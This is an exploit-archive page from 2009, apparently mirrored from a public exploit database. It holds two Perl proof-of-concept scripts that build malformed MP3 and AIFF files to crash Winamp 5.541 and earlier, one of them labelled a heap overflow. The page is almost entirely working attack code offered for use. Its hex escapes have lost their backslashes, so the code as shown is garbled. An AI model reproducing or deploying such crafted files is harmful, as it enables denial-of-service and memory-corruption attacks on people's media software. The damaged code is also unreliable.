Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits
# Published : 2009-01-12
# Author : securfrog
# Previous Title : Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC
# Next Title : Easy Web Password 1.2 Local Heap Memory Consumption PoC

################################################################################################################################
#Winamp <= 5.541 multiples Denial of Services (MP3/AIFF)
#
# Winamp MP3 file parsing DoS ==>
#!/usr/bin/perl
use strict;
my $mp3 =
"x49x44x33x00x00x00x00x00x09x07x54x49x54x32x00x00x00x08x00x00x00".
"x50x69x73x74x65x20x35x54x50x45x31x00x00x00x05x00x00x00x41x6e".
"x69x73x54x41x4cx42x00x00x00x0dx00x00x00x62x6cx61x62x6cx61x20".
"x44x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";
my $mp32 =
"x20" x 1500;

open(out, "> test.mp3");
binmode(out);
print (out $mp3, $mp32);
close(out);

#### Winamp AIFF file parsing header heap overflow :
#!/usr/bin/perl
use strict;
my $aiff =
"x46x4fx52x4dx00x04xcdxecx41x49x46x46x43x4fx4dx4dx41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
"x41x41x41x41x41x41x41x41x41x41x41x41x20x5ex01x18x0fx3cx0exe4".
"x00";
open(out, "> test.aiff");
binmode(out);
print (out $aiff);
close(out);

# www.Syue.com [2009-01-12]